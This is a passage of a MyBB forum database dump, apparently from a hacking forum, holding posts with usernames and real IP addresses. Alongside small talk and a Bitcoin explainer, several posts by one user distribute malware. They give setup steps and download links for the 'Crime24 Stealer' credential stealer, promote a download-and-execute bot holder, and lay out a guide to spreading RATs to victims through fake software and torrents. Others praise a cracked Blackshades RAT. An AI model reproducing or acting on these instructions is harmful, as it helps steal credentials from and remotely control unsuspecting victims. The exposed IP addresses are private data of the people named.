`edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4171', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349905160', 'that would be cool :D you have to give me his contact', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8477b9f51debb2e0397824799a19b417', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4172', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '62', 'R?????zo?', '1349905205', 'Thanks for this, I think I will start using this instead of DC.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9f78cf905929d40366e40b6ab48db1e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4173', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349905967', 'Alright. I\'ll tell him your interested when hes next online.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '9570ae7e34f4433dfa5d5c008113ce06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4174', '800', '4159', '15', 'RE: Blackshades v5.3 Cracked By The Old Warrior', '0', '203', 'NeonLights', '1349906330', 'yea u should :) i stopped using dc make sure ur ports are tcp and udp when using BS or it might not work', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', '18702f1f1c574918bbee90ea666a6557', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4176', '788', '4122', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349909098', '[quote=\'t3h jok3r\' pid=\'4122\' dateline=\'1349843007\'] [quote=\'??????????¢™\' pid=\'4119\' dateline=\'1349842486\'] Yep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists. [/quote] :roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up. I agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards. [/quote] LOL You laughed because I said \"Thanks to everyone except Anarchists.\" Huh?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '2733e679479bd13fa644d8e2ba7a280f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4177', '801', '0', '7', '[IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '100', '??zg???g????61', '1349909362', 'So there are already these countless articles out there, explaining in detail what exactly Bitcoin is and how exactly it works in the technical sense, but I still get the sense that people don\'t really understand it. That\'s why I decided to make this short Bitcoin for dummies piece, where I\'ll explain in very simple layman terms roughly what it is and how it works and perhaps why you should research it further. Basic description And having said that, lets get right to it, but before I get into anything else I just want to clarify what Bitcoin is. The best way to sort of describe it is by comparing it to money in a video game. Just like say gold in World of Warcraft Bitcoin is a fictional, basically made up money on the computer. It\'s using it\'s own software for generating, maintaining, securing and transferring of Bitcoins and even though you can already transfer them physically they do not exist outside of a computer chip in a physical form. Next I want to look at the terms that are most often used to describing Bitcoin: a decentralized digital p2p crypto-currency Let\'s start with decentralized. Unlike WoW gold which you can earn while playing the game Bitcoins are not being created and regulated by a main server or a central authority. With our example WoW the central authority is Blizzard, the producer of the game, who owns the servers, which you as a player connect to when you play the game. And it is these servers that decide how much of gold there is at any point in time and how players can earn it. With Bitcoin on the other all the rules are already embedded into the client you install on your computer. These rules were preset when Bitcoin was developed and cannot change anymore. If someone connects to the network they have to use a client that obeys these rules or they\'ll get ignored by the rest. So the only way to ever change the rules is to have the entire network switch to your client with your new rules. I don\'t want to delve into the economical or political implications of this type of a design, I just want you to be able to understand how it works. The next term is digital, which we already covered and as we said it means it exists solely on computers just like WoW gold. Next we have peer to peer which is what p2p stands for. This term describes how the Bitcoin network communicates. A peer is someone in the network who is running the Bitcoin client. This client acts both as a client and as a server, which means that unlike in a centrally run network like the WoW game, where the clients all connect to a central server, in the peer to peer network clients form a network by connecting to each other. And then theres crypto which is short for cryptography which describes how Bitcoin is secured. Basically it\'s a way of hiding and securing data, which among other things is used with securing online banking, protecting government secret digital data, securing secure communication lines ect. Now that we have a basic understanding of it\'s main features and what Bitcoin actually is. Let\'s look at how it all ties together and why it works. As we said Bitcoins are fictional, made up digital \"coins\" so you are probably asking yourself why couldn\'t someone just make up how many Bitcoins they have and cheat everyone else, especially if there is no central authority keeping track and keeping everyone honest. Well the reason they can\'t cheat lies in the next important part of it. In our WoW example it\'s the server which keeps track of every player\'s gold in it\'s own private database. Because Bitcoin is decentralized the database is public and a copy of it is downloaded on every single client. This in of itself does not keep everyone honest or secure but if you want to add a new entry to the database that says you received some coins, there are rules you have to follow or else when you send the new entry to the rest of the people for them to update their version of the database they\'ll reject it as invalid. These rules are really easy to check if they were followed and extremely hard or practically impossible to cheat. So in essence everyone is keeping everyone else honest. In order to comply with one of those rules you have to sacrifice your processor speed for solving a difficult mathematical problem, so there is a reward system in place for those who contribute. Anyone who wants to add a new entry to the database has to first solve that problem. It\'s a meaningless problem, but with our current technology can\'t be cheated and is very easy to verify. The solving of this problem is what the Bitcoin community dubbed as \"mining\". It\'s something you don\'t have to take part in order to able to use Bitcoin for transactions only and it\'s actually regulated through it\'s rules so that the more people \"mine\", the harder it is to solve the problem, where right now it\'s not even worth the electricity unless you have a good graphics card. This problem solving is also random which means it\'s impossible to know how fast someone will find a solution. The faster your computer, the less time it will take but it\'s still random which means someone with a way slower computer can get lucky and beat you to it. Who ever finds this solution first, can then make a new valid entry to the database and as a reward receive some Bitcoins. When a solution is found and new entry made, that entry also called a block, is then sent to everyone in the network to verify and add to their version of the database. This process is also how all the Bitcoins that will ever exists are going to get created and distributed. Basically all these virtual fictional coins are within that database. The database is constantly updated by people who participate in the \"mining\" process. Every time a new entry or a block is added someone received some brand new Bitcoins. These blocks also contain all the transactions between people which happened since the last block was created. Every coin in that database is attached to a pair of a public and private key. The person who owns a Bitcoin must have both the public key to which the Bitcoin is attached and the private key. It is these pairs of keys in a separate file on your computer called wallet.dat that determine the ownership. If you lose this pair of keys you lose your Bitcoin. This hopefully roughly explains how Bitcoin works. Now let\'s look at why someone would value these \"coins\" and use them as money online: - they are extremely secure and are becoming increasingly so with the growing network of Bitcoin users. - you can store your wallet.dat file anywhere you\'d like: USB stick, DVD, CD, online email account, ect ect - they are like cash which means no chargebacks are possible, once you send them, you can\'t get them back unless someone sends them back voluntarily - the supply of Bitcoins is limited to just under 21mio, so thievery through the invisible hand of monetary inflation is not possible - unless someone gets a hold of your wallet.dat file, no one can stop you from using them - even if all transactions are public in the distributed database there is no way for anyone to know by just looking through the database who those \"coins\" belong to - with proper precautions it is possible to remain pseudo-anonymous while using Bitcoins - the Bitcoin network is practically impossible to shutdown by anyone - no need for middlemen gobbling up expensive fees and requiring being trusted with your personal info - client software is open source, meaning the code is freely available to everyone and anyone can see and double check, what it does', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '0ebc962c02ad4ff37baf2d2a235a3585', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2861', '589', '0', '15', 'Crime24 Stealer', '0', '203', 'NeonLights', '1348962837', '[align=center][img]http://4.bp.blogspot.com/-WpTc5uHd5Co/T50oOfX5FQI/AAAAAAAAAMY/XDd0kytqSBI/s640/mhk94rvvsyoa.jpg[/img] Features • Webpanel • PHP Check • FTP Check • Melt Steal: • Internet Explorer • Google Chrome • Mozilla Firefox 9/10 • JDownloader • Steam User • Minecraft (FTP only) • FileZilla • Pidgin • Opera • MSN • ICQ [img]http://kepkezelo.com/images/lv9715jlj23l60xyp0g.gif[/img] Configuration Crime24 Stealer : # Step 1: Register In any Free Web Hosting like http://www.blackapplehost.com/register.jsp To obtain an FTP and a MySQL database for free. # Step 2: Once your registration is complete, go to your panel : \"UserCP\". Click \"Create/delete MySQL database\". Name the base as you wish, this will include your (username). In this example my username is \"example\". Click \"Create Database\".Choose a password of your choice : \"passw0rd\" Click \"Create User\". # Step 3: Open Crime24 StealerPHP Loggerindex.php and edit the part \"Configuration\". I\'ll show you my setup by following my example: $dbHost = \"localhost\"; // MySQL host => Leave it like that $dbUser = \"exemple_user\"; // MySQL username => Your username database $dbPass = \"passw0rd\"; // MySQL password => Your password database $dbDatabase = \"exemple_db\"; // MySQL database name => The name of your database $username = \"Votre-Login\"; // Login Username => Your login to connect to the panel logs $password = \"Votre-Pass\"; // Login Password => Your password to log in panel logs $logspage = 50; // Number of logs per page => Number of logs per page, leave it like that # Step 4: Return On BlackAppleHost, Click \"File manager\" in the \"User CP\" and uploaded index.php & style.css After this, Crime24 Stealer is well established! You can view your logs at the following address: http://username.blackapplehost.com/index.php Replace \"username\" by login to your account BlackAppleHost. # Step 5: Open Crime24 Stealer and fill the necessary information. URL : http://username.blackapplehost.com/index.php by replacing \"username\" by the login of your account BlackAppleHost. And Click Build Server [lock]download: http://adf.ly/382489/http://lh.rs/ez5eIWVcSm99 OR mirror: http://adf.ly/382489/https://www.dropbox.com/s/ljmbjqmr3g014pi/Crime24-Stealer.FreeHackTools.Com.rar[/lock][/align]', '67.68.75.193', '1128549313', '1', '0', '1', '1352011353', '1', 'a5774bafc427508b93ce6cca651d9e27', '0', '1352011353'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2863', '591', '0', '21', 'Amicitia Bot Holder', '0', '203', 'NeonLights', '1348963275', '[align=center][img]http://3.bp.blogspot.com/-E48xpdMRTqA/T-sebbj4SQI/AAAAAAAAAYs/B0Jz4QwSeRI/s400/EsYqd.png[/img] What is Amicitia?: Amicitia is a light-weight \"bot holder\" that can hold 100+ amout of bots, and then download and execute files on them. The server size is at 36KB with only one feature, and thats to download & execute. You can view their active window, and thats all. When download & executing, you will get a report on how many that successfully executed the file, and how many that failed. This bot is great for users that want to build up with I4I\'s! once you get ur required amout of servers, just download and execute ur RAT server. Why Amicitia?: Vb6, No dependecies. Light-weight Stable FREE! :) [img]http://4.bp.blogspot.com/-pyK1481xTP4/T-sevi_B3OI/AAAAAAAAAY0/Wgtqlo1NP0w/s320/2WtAm.png[/img] download: http://adf.ly/382489/http://www.mirrorcreator.com/files/WKQMNZKI/Amicitia_release_By_FreeHackTools.Com.rar_links[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '07b7acbdcbe8913232981ae772f48350', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2864', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '100', '??zg???g????61', '1348963496', 'Sounds good ;D I\'ll tell some people', '98.216.185.125', '1658370429', '1', '0', '0', '0', '1', 'b4a400584f4a0ac0539d0bbd26345e7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2865', '592', '0', '11', 'Lifehacker: The Guide to Working Smarter, Faster, and Better', '3', '203', 'NeonLights', '1348963578', '[align=center][img]http://3.bp.blogspot.com/-2qEzCq1gvXo/UE8n2IO9nwI/AAAAAAAAArY/BKAp8AcxerU/s400/51atkIMA2AL.jpg[/img] Lifehacker: The Guide to Working Smarter, Faster, and Better Adam Pash, Gina Trapani | Wiley | English | EPUB + PDF A new edition, packed with even more clever tricks and methods that make everyday life easier Lifehackers redefine personal productivity with creative and clever methods for making life easier and more enjoyable. This new edition of a perennial bestseller boasts new and exciting tips, tricks, and methods that strike a perfect balance between current technology and common sense solutions for getting things done. Exploring the many ways technology has changed since the previous edition, this new edition has been updated to reflect the latest and greatest in technological and personal productivity. The new \"hacks\" run the gamut of working with the latest Windows and Mac operating systems for both Windows and Apple, getting more done with smartphones and their operating systems, and dealing with the evolution of the web. Even the most tried-and-true hacks have been updated to reflect the contemporary tech world and the tools it provides us. Hacks include: Hack 1: Empty Your Inbox (and Keep It Empty). Hack 2: Decrease Your Response Time. Hack 3: Craft Effective Messages. Hack 4: Highlight Messages Sent Directly to You. Hack 5: Use Disposable Email Addresses. Hack 6: Master Message Search. Hack 7: Future-Proof Your Email Address. Hack 8: Consolidate Multiple Email Addresses with Gmail. Hack 9: Script and Automate Repetitive Replies. Hack 10: Filter Low-Priority Messages. Hack 11: Organize Your Documents Folder. Hack 12: Instantly Retrieve Files Stored on Your Computer. Hack 13: Overhaul Your Filing Cabinet. Hack 14: Instantly Recall Any Number of Different Passwords. Hack 15: Securely Track Your Passwords. Hack 16: Tag Your Bookmarks. Hack 17: Organize Your Digital Photos. Hack 18: Corral Media Across Folders and Drives. Hack 19: Create Saved Search Folders. Hack 20: Create a Password-Protected Disk on Your PC. Hack 21: Create a Password-Protected Disk on Your Mac. Hack 22: Encrypt Your Entire Windows Operating System. Hack 23: Set Up 2-Step Verification for Your Google Account. Hack 24: Design Your Own Planner. Hack 25: Make Your To-Do List Doable. Hack 26: Set Up a Morning Dash. Hack 27: Map Your Time. Hack 28: Quick-Log Your Workday. Hack 29: Dash Through Tasks with a Timer. Hack 30: Form New Habits with Jerry Seinfeld\'s Chain. Hack 31: Control Your Workday. Hack 32: Turn Tasks into Game Play. Hack 33: Send Reminders to Your Future Self. Hack 34: Take Great Notes. Hack 35: Organize Your Life with Remember the Milk. Hack 36: Organize Your Life in Text Files. Hack 37: Set Up a Ubiquitous Note-Taking Inbox Across Devices. Hack 38: Off-Load Your Online Reading to a Distraction-Free Environment. Hack 39: Limit Visits to Time-Wasting Websites. Hack 40: Permanently Block Time-Wasting Websites. Hack 41: Reduce Email Interruptions. Hack 42: Split Your Work Among Multiple Desktops. Hack 43: Build a No-Fly Zone. Hack 44: Set Up Communication Quiet Hours. Hack 45: Clear Your Desktop. Hack 46: Make Your House a Usable Home. Hack 47: Sentence Stuff to Death Row. Hack 48: Drown Out Distracting Sounds with Pink Noise. Hack 49: Search the Web in Three Keystrokes. Hack 50: Command Your Windows PC from the Keyboard. Hack 51: Command Your Mac from the Keyboard. Hack 52: Reduce Repetitive Typing with Texter for Windows. Hack 53: Reduce Repetitive Typing with TextExpander for Mac. Hack 54: Automatically Fill in Repetitive Web Forms. Hack 55: Batch-Resize Photos. Hack 56: Bypass Free Site Registration with BugMeNot. Hack 57: Speed Up Web Pages on a Slow Internet Connection. Hack 58: Securely Save Website Passwords. Hack 59: Become a Scheduling Black Belt with Google Calendar. Hack 60: Set Up an Automated, Bulletproof File Back Up Solution. Hack 61: Automatically Back Up Your Files to an External Hard Drive (Mac). Hack 62: Automatically Clean Up Your PC. Hack 63: Automatically Clean Up Your Mac. Hack 64: Automatically Reboot and Launch Applications. Hack 65: Make Google Search Results Automatically Come to You. Hack 66: Automatically Download Music, Movies, and More. Hack 67: Access Your Most Important Files Anywhere with Dropbox. Hack 68: Manage Your Documents in a Web-Based Office Suite. Hack 69: Carry Your Life on a Flash Drive. Hack 70: Create a Virtual Private Network (VPN) with Hamachi. Hack 71: Run a Home Web Server. Hack 72: Run Full-Fledged Webapps from Your Home Computer. Hack 73: Build Your Personal Wikipedia. Hack 74: Remotely Control Your Home Computer. Hack 75: Give Your Home Computer a Web Address. Hack 76: Optimize Your Laptop. Hack 77: Speed Up Your Touchscreen Typing. Hack 78: Break Down the Barrier Between Your Computer and Mobile Phone. Hack 79: Remote Control Your Computer with Your Phone. Hack 80: Automate Android Functions with Tasker. Hack 81: Set Up One Phone Number to Rule Them All. Hack 82: Augment Reality with Your Phone. Hack 83: Remember Where You’ve Been Using Location Awareness. Hack 84: Command Your Phone with Your Voice. Hack 85: Use Your Camera Phone as a Scanner. Hack 86: Make Your \"Dumbphone\" Smarter via Text Message. Hack 87: Connect Your Computer to the Internet via Mobile Phone by \"Tethering\". Hack 88: Develop Your (Digital) Photographic Memory. Hack 89: Send and Receive Money on Your Mobile Phone with PayPal. Hack 90: Google Like a Pro. Hack 91: Subscribe to Websites with RSS. Hack 92: Quickly Search Within Specific Websites from the Address Bar. Hack 93: Extend Your Web Browser. Hack 94: Supercharge Your Firefox Downloads with DownThemAll! Hack 95: Get 10 Useful Bookmarklets. Hack 96: Find Reusable Media Online. Hack 97: Get Your Data on a Map. Hack 98: Set Multiple Sites as Your Home Page. Hack 99: Access Unavailable Websites via Google. Hack 100: Have a Say in What Google Says About You. Hack 101: Clear Your Web Browsing Tracks. Hack 102: Rescue Your PC from Malware. Hack 103: Protect Your PC from Malware. Hack 104: Clean Up Your Startup. Hack 105: Undo System Configuration Changes. Hack 106: Truly Delete Data from Your Hard Drive. Hack 107: Compare and Merge Files and Folders with WinMerge. Hack 108: Firewall Your Windows PC. Hack 109: Firewall Your Mac. Hack 110: Speed Up Windows with a Thumb Drive. Hack 111: Free Up Hard-Drive Space. Hack 112: Resurrect Deleted Files. Hack 113: Hot Image Your PC for Instant Restoration. Hack 114: Hot Image Your Mac for Instant Restoration. Hack 115: Recover Files from an Unbootable PC. Hack 116: Share Windows Files. Hack 117: Share Mac Files. Hack 118: Keep Your Web Browser in Sync Across Computers. Hack 119: Share a Single Printer Between Computers. Hack 120: Optimize Your Dual Monitors. Hack 121: Control Multiple Computers with a Single Keyboard and Mouse. download: http://adf.ly/382489/http://www.mediafire.com/?jrrmj6ri8aqg3n6 OR mirror: http://adf.ly/382489/http://www.mediafire.com/?ws2nfcjjtcsec4y[/align]', '67.68.75.193', '1128549313', '1', '0', '203', '1348963614', '1', '1d6d7899051943c168d72015c4c0a393', '0', '1348963614'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2866', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1348963581', 'The more people, the more fun. The more people, the faster the contest will end.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c043d92b3e38b80feb318d5e6de843a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2867', '593', '0', '12', 'How To Get More Victims To Your Rat', '0', '203', 'NeonLights', '1348963872', '[align=center][img]http://4.bp.blogspot.com/-tx-aLhsJ2ho/T79U-Lsc60I/AAAAAAAAAPs/xnrS3FIQ5R4/s400/ztd8om.png[/img] Maybe you saw some people get hundreds of victims every day They rely on the penetration of random And all their victims from popular forums and torrent Today I will explain to you the ways in which they use . Sources of the victims : Torrrent Social networks & Forums Sites publish the files like dvb-upload.com Chat rooms How to get victims : Create a fake software Has become a widespread phenomenon in youtubeYou can experiment and you\'ll get thousands of victims But you first have to increase the number of Views I advise you to use vagex.com and Of course you you must to disable comment on your video Torrent the best source of victim you can easily create your account in thepiratebay.com and create a torent using Any program that supports torrent just choose a software and inject or bind this software with your clean server and do not forget to add trackers in your torrent This video explain how to create a torrent : [video=youtube]http://www.youtube.com/watch?v=m1tgW_8t0MI&[/video] from the forums you can get a lot of victims Some times I put private software and remember Do not put a download link But (Pm Me :D for mediafire link) To target members :) So this method is not in all forums you can put the link in the warez site There is no need not explain :) Some professional hackers Use other ways They scan A large number of Random Ip To discover Exploit Will generally put a special topic in this type ... And finally offer you a program named Spread Robot With this program you can spread your server in (Shareaza - Areas - eMule ) The main interface of the program: [img]http://4.bp.blogspot.com/-B2as7_wk2kc/T79r_ka1_MI/AAAAAAAAAP4/JSTYtwJb9gA/s400/1.png[/img] Click Get Warez : [img]http://2.bp.blogspot.com/-JBCypwZHJUw/T79sN78V1RI/AAAAAAAAAQI/q0yVLeW6xWM/s400/2.png[/img] and choose the path of your server and Make Warez File : Then the software will create a file in which each of these programs and share the files in (Shareaza - Areas - eMule ) [img]http://4.bp.blogspot.com/-RQVlHjK5Lb8/T79s4N86dFI/AAAAAAAAAQQ/HpE6kABDBQ0/s640/94994612.png[/img] Always select Icon Setup or Install the Server and pumb the files Even up to 2mg using hex workshop download: http://adf.ly/382489/http://www.mediafire.com/?0qn1iiz9yx115w8[/align]', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '4ab69b586daccbe1a8f975b7a1359504', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2868', '594', '0', '64', 'Noobroom (Online Movie Streaming Site)', '0', '82', 'iTzIpod', '1348964266', 'There\'s this site that has been online for a while now. And this site allows you to instantly stream movies FREE. No Downloads. No Surveys. No Registrations. Just go on http://noobroom.com/ and then copy in the IP Address/URL Link which is http://37.128.191.200/ And there you go! Click on the A-Z List and pick a movie. Then, sit back, relax, and watch! Enjoy! - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1af012b05d22f8711240d4050e182890', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2869', '595', '0', '65', 'What movie did you watch recently?', '0', '1', 't3h jok3r', '1348965064', 'I recently got done watching all Resident Evil movies.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'acf0e6c8808b3719617754f4c8df08e9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2870', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1348965132', 'Transformers: Dark Of The Moon. Was alright. 5/5 I watched it today at 10 AM on Netflix.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d2eb16d2a10291d318129edfeb032aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2871', '596', '0', '3', '[Announcement]New forums added!', '0', '1', 't3h jok3r', '1348965311', 'I recently added the movies forum. Feel free to discuss your favorite movies there. I have also added a Movie RIPs section which will only be available to Elite.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b0ff3074a5489cb87d09a7589ea2b3b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2872', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '1', 't3h jok3r', '1348965388', 'We need 200 more posts to reach 3K posts. This is the 2,800th post.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3a35886b8ab7457006ce551aeff7e6ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2873', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '203', 'NeonLights', '1348965709', 'Cool, i watched the nex expandables 2 this weekend :) was pretty chill', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', 'e2289a7f6e54b31e054268a8e27d614b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2874', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348966520', 'We can get that in a couple of days. Probably tomorrow, Monday, or Tuesday. Guaranteed.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '153897d2641f1f78fdef3c7f0998eec5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2875', '596', '2871', '3', 'RE: [Announcement]New forums added!', '0', '82', 'iTzIpod', '1348966560', 'Thanks for the update. Will hope it becomes active and boosts the forum\'s activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4df240ff79059aa0ba4b9c5e06cd7117', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2876', '539', '2783', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1348968456', '[quote=\'Timmy\' pid=\'2783\' dateline=\'1348891350\'] Welcome to l33thacking and oh hell yeah my son got some pussy. [/quote] what do you mean by: my son got some pussy. ? and btw nice avatar :P', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '630b59136b8ba8efd70018cda7367df1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2877', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '5', 'Timmy', '1348968770', 'I just watched wrong turn. Pretty cool movie.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4cb70ce8c8fa599382aef39317dd0352', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2878', '596', '2871', '3', 'RE: [Announcement]New forums added!', '0', '5', 'Timmy', '1348968812', 'NOw thats what im talking about. Thanks for the section', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7efab8a9646003137c453904b34d42d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2879', '539', '2876', '4', 'RE: YO WHAT UP!', '0', '5', 'Timmy', '1348968881', '[quote=\'NeonLights\' pid=\'2876\' dateline=\'1348968456\'] [quote=\'Timmy\' pid=\'2783\' dateline=\'1348891350\'] Welcome to l33thacking and oh hell yeah my son got some pussy. [/quote] what do you mean by: my son got some pussy. ? and btw nice avatar :P [/quote] Thanks and you got a GF so you obviously gonna fuck her.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '822ec188d6c9a23dcabfc83d59510348', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2880', '539', '2879', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', 